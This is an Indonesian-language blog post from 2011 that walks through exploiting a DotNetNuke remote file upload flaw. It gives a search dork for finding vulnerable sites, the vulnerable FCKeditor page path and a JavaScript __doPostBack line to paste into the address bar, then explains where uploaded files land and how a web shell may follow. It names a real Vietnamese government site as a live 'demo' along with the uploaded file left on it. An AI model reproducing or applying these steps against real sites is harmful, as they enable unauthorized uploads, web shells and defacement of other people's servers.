Friday, January 7, 2011

DNN (dotnetnuke) remote file Upload Vulnerability


dork : inurl:portals/0/

Setelah anda Menemukan jalan DNN kemudian pergi ke file ini
expl : 127.1.0.0/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Pilih: File (A File Pada Situs Anda)
setelah Loading maka Pasang java script di bawah ini pada addres bar url browser anda
javascript: __doPostBack (‘$ ctlURL cmdUpload’,”)
sekarang Anda melihat Browse
root folder pilih dan file Anda akan meng-upload ke
situs/dnn path/Portals/0
Catatan: Anda hanya dapat meng-upload *. swf, *. jpg, *. jpeg, *. JPE, *. gif, *. bmp, *. png, *. doc, *. xls, *. ppt, *. pdf, *. txt, *. xml, *. xsl, *. css, *. zip, *. 3gp, *. asf, *. asx, *. avi, *. flv, *. m4v, *. mov, *. mp4, *. mpe, *. mpeg, *. mpg, *. ram, *. rm, *. rmvb, *. wm, *. wmv, *. vob
oleh defualt tetapi admin dapat mengubah ini dan Anda akan memiliki Shell
demo : http://www.dav.gov.vn/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
hasil : http://www.dav.gov.vn/Portals/0/magelangcyber.txt

 

No comments:

Template by : mhiman@ hacker-newbie.org